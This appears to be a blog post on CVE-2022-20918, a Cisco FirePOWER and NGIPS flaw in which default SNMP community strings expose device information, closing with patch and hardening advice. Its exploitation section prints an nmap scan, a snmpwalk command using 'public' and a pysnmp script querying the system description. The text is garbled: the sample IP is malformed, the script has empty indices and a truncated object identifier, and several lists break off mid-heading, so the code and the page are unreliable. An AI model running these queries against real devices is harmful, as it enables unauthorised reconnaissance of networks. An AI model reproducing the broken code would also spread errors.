In late 2022, security researchers uncovered CVE-2022-20918, a serious vulnerability affecting multiple Cisco security products, specifically the Cisco FirePOWER Software for Adaptive Security Appliance (ASA) FirePOWER module, Firepower Management Center (FMC) Software, and Next-Generation Intrusion Prevention System (NGIPS) Software. This bug allows unauthenticated remote attackers to retrieve sensitive configuration and network details from vulnerable systems—all thanks to leftover default SNMP credentials most admins might overlook.
In this post, we’ll break down what the vulnerability is, what products are at risk, how an attacker could exploit it, sample attack code, and how you should protect your infrastructure.
What Is CVE-2022-20918?
This bug is what security experts call a default credential vulnerability in the handling of SNMP (Simple Network Management Protocol) access controls. On affected Cisco devices, both SNMPv1 and SNMPv2 come out-of-the-box with a default SNMP community string (essentially a shared password) that can be used to perform read-only queries. Cisco’s products use these community strings for managing network hardware, and normally, admins are expected to change them.
If SNMP is enabled, but the community string isn’t changed from the default value, an unauthenticated attacker on the network can send a simple SNMP "GET" request and pull network info—completely bypassing the expected access restrictions.
Cisco Next-Generation Intrusion Prevention System (NGIPS) Software
Important: If SNMP is disabled, or the community string is changed from the default, your system is safe from this attack.
References
- Cisco Advisory for CVE-2022-20918
- NIST Database Entry for CVE-2022-20918
Exploitation: How Attackers Pull Sensitive Info
The exploit is dead simple: an attacker only needs to know that SNMP is running on the target, and send SNMP requests using the default community string (like public). Here’s how a basic attack looks in practice:
First, the attacker scans for open SNMP ports (default UDP port 161)
nmap -sU -p 161 <target_ip>
If port 161 is open, the attacker uses SNMP tools (like snmpwalk) to pull information
snmpwalk -v2c -c public <target_ip>
If the device is vulnerable, you’ll see pages of info about interfaces, routing tables, configs, and more.
Python Example: Exploiting SNMP with Default Credentials
Here’s a minimal Python script using the pysnmp library to perform a GET request for the system description:
from pysnmp.hlapi import *
target_ip = "192..2.10" # Replace with target device IP
community = "public" # Default community string
iterator = getCmd(
SnmpEngine(),
CommunityData(community, mpModel=1), # SNMP v2c
UdpTransportTarget((target_ip, 161)),
ContextData(),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', ))
)
errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(), errorIndex and varBinds[int(errorIndex) - 1][] or '?'))
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind]))
Result: If the target is vulnerable, this script will return the system description string for the device, potentially leaking info about the software version and setup to the attacker.
What’s the Real-World Risk?
While attackers cannot write or make changes with this bug, having access to SNMP information can lead to:
Upgrade Cisco Software
- Update to a fixed version as listed on Cisco’s advisory.
Key Takeaways
- CVE-2022-20918 makes it easy for attackers to read Cisco FirePOWER device info over SNMP if default creds are not changed.
The attack doesn’t allow changes, but can leak data useful for further exploitation.
- Fix it: Change community strings, disable SNMP if possible, and always keep your devices updated.
Learn More
- Cisco Advisory
- NIST CVE-2022-20918
- Understanding SNMP Security Risks
Timeline
Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 00:48:00 UTC